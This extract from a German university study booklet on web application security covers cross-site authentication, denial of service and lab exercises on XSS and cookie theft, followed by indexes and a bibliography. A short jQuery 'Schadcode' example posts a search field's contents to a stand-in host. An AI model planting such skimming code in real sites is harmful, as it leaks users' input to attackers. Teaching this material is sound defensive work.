Seite 162 Studienbrief 5 Web Applications Security

http://example.com/test.php übertragen. Dabei wird der Inhalt der Variablen q imPOST-Feld begriff übertragen.

QQuelltext 5.1: Formularfeld

1 <input id="begriff" name="begriff" type="text">2 <input id="button" name="button" type="submit" value="suchen">

QQuelltext 5.2: Schadcode

1 $("#button").mousedown(function(){2 var q = $("#begriff").val();3 $.post("http://example.com/test.php", {begriff: q} );4 });

Schutzmechanismen

XSS Da diese Maßnahme auf Cross-Site-Scripting aufbaut, gelten hier die gleichenSchutzmechanismen. Wie immer gilt es, da jede Eingabe durch Benutzer gefiltertwerden muss.

K Kontrollaufgabe 5.16: Cross-Site-Authentication

Bei welcher Aktion wird der Cross-Site-Authentication-Angriff ausge-führt?

5.4.3 Angriffe auf Netzwerk-Ebene

Kommunikation Auf der Netzwerk-Ebene wird versucht, die Kommunikation zwischen Client undServer entweder abzufangen, zu manipulieren oder ganz zu unterbinden.

Denial-of-Service

Eine Denial-of-Service-Attacke (auch als DoS-Attacke abgekürzt) ist ein Angriff,der dazu führen soll, dass eine Website temporär, oder in besonders extremenFällen auch dauerhaft, nicht mehr erreicht werden kann. DoS-Attacken sind inder Regel nichts weiter als Cyber-Vandalismus, die bei Unzufriedenheit mit einerSituation eingesetzt wird. Dies kommt relativ häufig vor, da viele Tools existieren,die ohne tieferes Know-how bedient werden können. Die Software Low OrbitIon Cannon (siehe Abbildung 5.10) wird durch die einfache Bedienbarkeit häufigeingesetzt [Ziegler, 2014, S. 103].

D Definition 5.1: Denial-of-Service

Denial-of-Service-Attacken sind Angriffe mit dem Ziel, die Nutzung vonDienste oder einer bestimmten Ressource eines Rechners/Servers so zu ma-nipulieren, dass diese für einen berechtigten Benutzer oder einen größerenBenutzerkreis nicht mehr zu Verfügung stehen.

5.6 Übungen Seite 171

ÜÜbung 5.1: Quelltext-Analyse

Analysieren Sie auf der Demo-Plattform den Quelltext des Logins unter„Übungen“ > „1. Quelltext-Analyse“. Wie lautet das Klartext-Passwort fürden Login?

ÜÜbung 5.2: URL-Manipulation

Analysieren Sie auf der Demo-Plattform den Login unter „Übungen“ > „2.URL-Manipulation“. Wie kann hier die URL manipuliert werden, damit Sieals Admin angemeldet sind?

ÜÜbung 5.3: Cross-Site-Scripting (reflected)

Analysieren Sie auf der Demo-Plattform den Login unter „Übungen“ > „3.Cross-Site-Scripting (reflected)“. Schleusen Sie einen temporären JavaScript-Code in diese Seite ein. Erzeugen Sie zur Bestätigung ein Dialogfenster mitdem Befehl alert(), das die Meldung „Open C3S“ ausgibt.

ÜÜbung 5.4: Cross-Site-Scripting (persistent)

Analysieren Sie auf der Demo-Plattform den Login unter „Übungen“ >„4. Cross-Site-Scripting (persistent)“. Schleusen Sie einen JavaScript-Codedauerhaft in diese Seite ein. Erzeugen Sie zur Bestätigung ein Dialogfenstermit dem Befehl alert(), das die Meldung „Open C3S“ ausgibt.

ÜÜbung 5.5: Session Hijacking – Cookie manipulieren

Analysieren Sie auf der Demo-Plattform den Login unter „Übungen“ > „5.Session Hijacking – Cookie manipulieren“. Manipulieren Sie so die vorhan-denen Cookie-Einträge, damit sie angemeldet sind. Installieren Sie dazu dasWebbrowser Add-On „Firebug“. Verwenden Sie dazu die folgende Session-ID:042fe0176a89aade16edb0e8665db4e9

ÜÜbung 5.6: Session Hijacking – Cookie klauen

Analysieren Sie auf der Demo-Plattform den Login unter „Übungen“ > „6.Session Hijacking – Cookie klauen". Lesen Sie die vorhandenen Cookie-Einträge mit JavaScript aus und geben Sie diese zur Bestätigung in einemDialogfenster mit dem Befehl alert() aus.

Verzeichnisse Seite 189

Verzeichnisse

I. Abbildungen

Abb. 1.1: Zwei verbundene Rechner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13Abb. 1.2: Zwei Clients sind mit einem Server verbunden . . . . . . . . . . . . . . . . . . . . . . . . . . 15Abb. 1.3: Schema einer Ring-Topologie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16Abb. 1.4: Schema einer Bus-Topologie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16Abb. 1.5: Schema einer Stern-Topologie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17Abb. 1.6: Schema eines Punkt-zu-Punkt-Netzes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17Abb. 1.7: Schema der Kommunikationsarten Unicast, Multicast und Broadcast . . . . . . . . . . . . . 18Abb. 1.8: Gliederung der verschiedenen Netztypen . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19Abb. 1.9: Ein Switch in einem Netzwerk . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21Abb. 1.10: Schematische Darstellung einer Internet-Verbindung . . . . . . . . . . . . . . . . . . . . . . 22Abb. 1.11: Geschwindigkeiten der Internetzugänge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24Abb. 1.12: Beispiel eines Drei-Schichten-Modells . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28Abb. 1.13: ISO/OSI-7-Schichten-Referenzmodell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29Abb. 1.17: Domainaufbau . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37Abb. 1.18: URI-Aufbau . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38Abb. 1.19: URL-Aufbau . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39Abb. 1.20: VirtualBox-Installationsdialog . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45Abb. 1.21: Auswahl der Komponenten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45Abb. 1.22: Programmverknüpfungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45Abb. 1.23: Netzwerkschnittelle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46Abb. 1.24: Installation starten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46Abb. 1.25: Installation abschließen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46Abb. 1.26: VirtualBox . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47Abb. 1.27: Import . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47Abb. 1.28: Image auswählen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48Abb. 1.29: Import starten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48Abb. 1.30: Netzwerk Einstellungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49Abb. 1.31: USB deaktivieren . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49Abb. 1.32: Test-System starten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50Abb. 1.33: Anmeldung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50Abb. 1.34: Anwendungen starten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51Abb. 1.35: Test-System ausschalten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51Abb. 1.36: Demo-Plattform installieren . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52Abb. 1.14: TCP/IP-Referenzmodel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54Abb. 1.15: TCP/IP-Protokollstapel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55Abb. 1.16: Beispiel einer ARP-Anfrage. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56Abb. 2.1: Ausbreitung des ARPANETs von 1969 bis 1977 arp . . . . . . . . . . . . . . . . . . . . . . . 58Abb. 2.2: Struktur-Knotenpunkte des ARPANETs im Jahre 1977 wp- [a] . . . . . . . . . . . . . . . . . . 58Abb. 2.3: Erster Webserver von Tim Berners-Lee am CERN tel [a] . . . . . . . . . . . . . . . . . . . . . 60Abb. 2.4: Screenshot des Mosaic Webbrowsers wp- [b] . . . . . . . . . . . . . . . . . . . . . . . . . . 61Abb. 2.5: Organigramm der Internet Society (ISOC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63Abb. 2.6: Leistungen von Cloud Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67Abb. 2.7: Ebenen der Clouds . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68Abb. 2.8: Anforderungen an Cloud Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69Abb. 3.1: Aktives FTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80Abb. 3.2: Passives FTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81Abb. 3.3: SSH-Client PuTTY . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85Abb. 3.4: Aufbau einer E-Mail-Adresse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87Abb. 3.5: SMTP-Verbindung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94Abb. 3.6: ICQ-Screenshot icq . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102Abb. 3.7: YIM-Screenshot yim [a] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103

Seite 190 Verzeichnisse

Abb. 3.8: Skype unter Android sky [a] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105Abb. 4.1: Word-Wide-Web-Komponenten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109Abb. 4.2: HTTP-Header in Google Chrome . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110Abb. 4.3: Ablauf der Kommunikation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135Abb. 4.4: Bestellformular . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141Abb. 4.5: Pythonauswertung Ergebnisseite . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141Abb. 5.1: Google Maps Screenshot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145Abb. 5.2: Abstrahiertes Modell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146Abb. 5.3: Analyse des Quelltextes in Firebug . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155Abb. 5.4: Analyse der übertragenen Daten in Firebug . . . . . . . . . . . . . . . . . . . . . . . . . . . 155Abb. 5.5: temporäres Cross-Site-Scripting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157Abb. 5.6: dauerhaftes Cross-Site-Scripting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157Abb. 5.7: Ergebnis des XSS-Angriffs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158Abb. 5.8: Verhalten in Google Chrome . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 159Abb. 5.9: Screenshot des Reiter „Cookie“ in Firebug . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161Abb. 5.10: Screenshot der Low Orbit Ion Cannon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163Abb. 5.11: Screenshot der Demo-Plattform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170Abb. 5.12: Übungen auf der Demo-Plattform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170Abb. 13: LAN Interface Konsolenausgabe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174Abb. 14: WLAN Interface Konsolenausgabe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174Abb. 15: Schritt 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174Abb. 16: Schritt 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175Abb. 17: Schritt 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175Abb. 18: Tier Überblick . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183

II. Beispiele

Beispiel 1.1: IP-Adresse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13Beispiel 1.2: Kabelloses Netzwerk (WLAN) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17Beispiel 1.3: Angriffsziel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22Beispiel 1.4: ARP-Spoofing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32Beispiel 1.5: IPv4-Adresse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34Beispiel 1.6: IPv6-Adresse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34Beispiel 1.7: IP-Spoofing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35Beispiel 1.8: Manipulation von DNS-Einträgen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40Beispiel 1.9: DNS-Spoofing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40Beispiel 1.10: Portscanner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41Beispiel 2.1: Amazon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68Beispiel 2.2: Flickr . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69Beispiel 2.3: Radio.de . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70Beispiel 2.4: Google . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71Beispiel 2.5: Internetfähige Drucker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72Beispiel 3.1: SIP-Konfiguration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106Beispiel 4.1: Cookie-Sicherheit 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112Beispiel 4.2: Cookie-Sicherheit 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113Beispiel 4.3: Session-Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113Beispiel 4.4: HTTPS-Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115Beispiel 4.5: Formular-Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122Beispiel 4.6: CSS-Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123Beispiel 4.7: JavaScript-Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126Beispiel 4.8: AJAX-Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126Beispiel 4.9: Flash-Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128Beispiel 4.10: Java-Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129Beispiel 5.1: Webmail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143Beispiel 5.2: Unverschlüsseltes WLAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153

Definitionen Seite 191

Beispiel 5.3: Interne Anwendung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160Beispiel 5.4: Zwei-Faktor-Authentifizierung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169

III. Definitionen

Definition 5.1: Denial-of-Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162Definition 5.2: SQL-Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164

IV. Exkurse

Exkurs 1.1: Überseekabel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20Exkurs 1.2: Internettelefonie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21Exkurs 1.3: DE-CIX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23Exkurs 1.4: Virtualisierung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44Exkurs 2.1: Widerstand gegen nukleare Angriffe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59Exkurs 2.2: Angriffe auf IoT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75Exkurs 3.1: BitTorrent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84Exkurs 3.2: @-Zeichen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88Exkurs 3.3: Umstellung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104Exkurs 4.1: User-Agent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111Exkurs 4.2: HTTP-Header . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111Exkurs 4.3: Weitere HTML-Elemente . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122Exkurs 4.4: Weitere CSS-Deklarationen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124Exkurs 5.1: Alternative Angriffsvektoren . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166

V. Kontrollaufgaben

Kontrollaufgabe 1.1: Client-Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15Kontrollaufgabe 1.2: Vernetzung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15Kontrollaufgabe 1.3: Topologie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18Kontrollaufgabe 1.4: Internetverbindung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23Kontrollaufgabe 1.5: Endgeräte . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27Kontrollaufgabe 1.6: Schichtenmodell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29Kontrollaufgabe 1.7: WLAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31Kontrollaufgabe 1.8: IP-Adressen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33Kontrollaufgabe 1.9: IP- u. MAC-Adressen von LAN-Interface auswerten . . . . . . . . . . . . . . . . . 34Kontrollaufgabe 1.10: Windows Personal Firewall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42Kontrollaufgabe 1.11: VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43Kontrollaufgabe 1.12: Nutzung von Tunneling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43Kontrollaufgabe 2.1: ARPANET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59Kontrollaufgabe 2.2: FTP-Protokoll . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59Kontrollaufgabe 2.3: IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61Kontrollaufgabe 2.4: Kernprinzipien . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62Kontrollaufgabe 2.5: Organisationen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66Kontrollaufgabe 2.6: Cloud Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71Kontrollaufgabe 2.7: Internet der Dinge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75Kontrollaufgabe 2.8: Funktionen von IoT-Geräten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75Kontrollaufgabe 2.9: Probleme mit IoT-Geräten . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75Kontrollaufgabe 2.10: Big Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76Kontrollaufgabe 3.1: FTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82Kontrollaufgabe 3.2: SFTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83Kontrollaufgabe 3.3: Peer-to-Peer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84Kontrollaufgabe 3.4: SSH Sicherheit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85

Seite 192 Verzeichnisse

Kontrollaufgabe 3.5: E-Mail-Header-Analyse mit Auswertungsprogramm . . . . . . . . . . . . . . . . . 92Kontrollaufgabe 3.6: POP3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96Kontrollaufgabe 3.7: Skype . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105Kontrollaufgabe 3.8: Session Initiation Protocol . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106Kontrollaufgabe 4.1: HTTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112Kontrollaufgabe 4.2: Cookie . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113Kontrollaufgabe 4.3: HTTP-Request und -Response mitschneiden und analysieren . . . . . . . . . . . . 114Kontrollaufgabe 4.4: SSL/TLS-Zertifikate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115Kontrollaufgabe 4.5: HTML-Seite mit Formular . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122Kontrollaufgabe 4.6: HTML-Seite mit CSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124Kontrollaufgabe 4.7: HTML-Seite mit JavaScript . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126Kontrollaufgabe 4.8: Formularauswertung mit getvalue . . . . . . . . . . . . . . . . . . . . . . . . . . 139Kontrollaufgabe 5.1: Application Service Provider . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144Kontrollaufgabe 5.2: Rich Internet Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145Kontrollaufgabe 5.3: Layer vs. Tier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 145Kontrollaufgabe 5.4: Tier-Modell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147Kontrollaufgabe 5.5: Ebenen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148Kontrollaufgabe 5.6: Savety, Security, Privacy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151Kontrollaufgabe 5.7: Authentisierung und Authentifizierung . . . . . . . . . . . . . . . . . . . . . . . . 151Kontrollaufgabe 5.8: Schutzziele . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153Kontrollaufgabe 5.9: Angreifertyp Hacktivist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153Kontrollaufgabe 5.10: Angreifer und Angriffsart . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154Kontrollaufgabe 5.11: Quelltext-Analyse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155Kontrollaufgabe 5.12: URL-Manipulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156Kontrollaufgabe 5.13: Cross-Site-Scripting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 159Kontrollaufgabe 5.14: Cross-Site-Request-Forgery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160Kontrollaufgabe 5.15: Session Hijacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161Kontrollaufgabe 5.16: Cross-Site-Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162Kontrollaufgabe 5.17: Distributed Denial-of-Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163Kontrollaufgabe 5.18: SQL-Injection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167Kontrollaufgabe 5.19: Brute-Force . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169

VI. Tabellen

Tabelle 1.1: Beschreibung der einzelnen Schichten des ISO/OSI-Modells . . . . . . . . . . . . . . . . . . 30Tabelle 1.2: Beispiele einiger fester Ports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41Tabelle 2.1: Test . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74Tabelle 3.1: SMTP-Codes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94Tabelle 3.2: Übersicht POP3-Befehle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96Tabelle 4.1: My caption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138

VII. Literatur

US-Cloud von Amazon gestört.http://www.heise.de/newsticker/meldung/US-Cloud-von-Amazon-gestoert-1231873.html, a.Abgerufen am: 23.08.2016.

Wolkenbruch bei Amazon: Datenverlust in der Cloud.http://www.heise.de/newsticker/meldung/Wolkenbruch-bei-Amazon-Datenverlust-in-der-Cloud-1234444.html, b.Abgerufen am: 23.08.2016.

Architektur und Design einerWebanwendung für die FinanzbuchhaltungssoftwareMoRIS mit Bereitstellungeines Prototypen.

Literatur Seite 193

http://www.rn.inf.tu-dresden.de/uploads/studentische_arbeiten/diplomarbeit_burghagen_n.pdf.Abgerufen am: 23.08.2016.

Ard/zdf-onlinestudie 2014.http://www.ard-zdf-onlinestudie.de/.Abgerufen am: 23.08.2016.

ARPA Kadabra: Die Geschichte des Internet.http://www.fibel.org/linux/lfo-0.6.0/node457.html.Abgerufen am: 23.08.2016.

Google: Chrome OS soll Windows in Firmen ablösen.http://winfuture.de/news,58447.html.Abgerufen am: 23.08.2016.

Anwälte warnen: Cloud Computing mit Datenschutz unvereinbar.http://www.it-business.de/news/recht/vorschriften-regulierungen/compliance/articles/253091/,a.Abgerufen am: 23.08.2016.

Beim Cloud Computing drohen gefährliche Lücken.http://www.welt.de/wirtschaft/webwelt/article12680570/Beim-Cloud-Computing-drohen-gefaehrliche-Luecken.html, b.Abgerufen am: 23.08.2016.

Damit das Cloud Computing nicht zur Rechtsfalle wird.http://www.computerwoche.de/management/it-strategie/2362186/, c.Abgerufen am: 23.08.2016.

Traffic statistics.https://www.de-cix.net/about/statistics/.Abgerufen am: 23.08.2016.

Besuch beim weltgrößten internetknoten.http://www.dw.de/dw/article/0,,15959223,00.html.Abgerufen am: 23.08.2016.

Internet-Technologien.http://www.enzyklopaedie-der-wirtschaftsinformatik.de/wi-enzyklopaedie/lexikon/technologien-methoden/Rechnernetz/Internet/Internet-Technologien.Abgerufen am: 23.08.2016.

Flash sicherheit zdnet.http://www.zdnet.de/88274512/adobe-stopft-kritische-loecher-in-flash-player-reader-und-acrobat/.Abgerufen am 29.8.2016.

Futurezone.at html5.http://futurezone.at/tag/HTML5.Abgerufen am 29.8.2016.

GI stellt zehn Thesen zu Sicherheit und Datenschutz in Cloud Computing vor.http://www.gi.de/aktuelles/meldungen/detailansicht/article/gi-stellt-zehn-thesen-zu-sicherheit-und-datenschutz-in-cloud-computing-vor-1.html.Abgerufen am: 23.08.2016.

Seite 194 Verzeichnisse

Sicherheitslücke in fritzbox wird wieder ausgenutzt.http://www.golem.de/news/avm-alte-sicherheitsluecke-in-fritzbox-wird-wieder-ausgenutzt-1409-109497.html.Abgerufen am: 23.08.2016.

Online-Netzwerke verändern die Gesellschaft.http://www.handelsblatt.com/technologie/it-tk/it-internet/facebook-und-co-online-netzwerke-veraendern-die-gesellschaft/6214974.html.Abgerufen am: 23.08.2016.

Hackerangriff auf whatsapp.http://www.heise.de/security/meldung/Hackerangriff-auf-WhatsApp-1974342.html, a.Abgerufen am: 23.08.2016.

Meta-hack stört hunderte medien-webseiten.http://www.heise.de/security/meldung/Meta-Hack-stoert-hunderte-Medien-Webseiten-2467599.html, b.Abgerufen am: 23.08.2016.

Avm-router: Fritzbox-lücke erlaubt telefonate auf fremde kosten.http://www.heise.de/security/meldung/AVM-Router-Fritzbox-Luecke-erlaubt-Telefonate-auf-fremde-Kosten-3065588.html, c.Abgerufen am: 24.08.2016.

Smart home: Hacker übernehmen kontrolle über thermostat.http://www.heise.de/newsticker/meldung/Smart-Home-Hacker-uebernehmen-Kontrolle-ueber-Thermostat-3291209.html, d.Abgerufen am 29.8.2016.

Open Web Platform Milestone Achieved with HTML5 Recommendation.http://www.w3.org/2014/10/html5-rec.html.en.Abgerufen am: 23.08.2016.

